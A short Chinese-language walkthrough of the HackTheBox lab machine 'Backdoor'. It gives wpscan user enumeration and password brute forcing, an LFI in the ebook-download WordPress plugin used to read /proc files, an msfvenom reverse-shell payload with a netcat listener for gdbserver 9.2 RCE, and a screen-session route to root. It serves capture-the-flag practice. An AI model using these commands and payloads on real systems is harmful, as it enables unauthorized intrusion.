80 port 是 wordpress, wpscan 開掃,沒掃到什麼有用的
1337 不知道是什麼服務
wpscan --url http://10.10.11.125/ --enumerate u
掃描找到 user admin
wpscan --url http://10.10.11.125/ --users admin --passwords rockyou.txt
爆破未成功
可以直接看 /wp-content/plugins
底下有哪些插件,搜尋 ebook-download 後有看到 LFI 漏洞,http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/tmp/qwer
接下來要想辦法知道 1337 上開啟什麼服務,查了一下資料,可以透過 /proc/net/tcp
查看哪個 ip:port 和 inode 對應,再去爆破 /proc/$pid/fd/$n
,用 file
之類的指令找到 fd 對應的 socket ,但是在 LFI 的情境下無法這樣獲得對應關係。另外可以查看 /etc/services
看管理者是不是有把 service - port 對應關係寫在裡面。這兩個方法在這題都不通
最後是 burpsuite 遍歷 /proc/$pid/cmdline
查看所有正在執行的命令
找到 1337 跑 gdbserver
搜尋 gdbserver exploit,找到 gdbserver 9.2 rce
產生 payload msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.60 LPORT=4444 PrependFork=true -o rev.bin
listen nc -nvlp 4444
exploit!
linpeas.sh
另外 https://medium.com/@bocahganteng/write-up-backdoor-htb-c0092079ef2c 有寫到 root 似乎有開 screen,並且 user 剛好有權限掛 root 的 screen session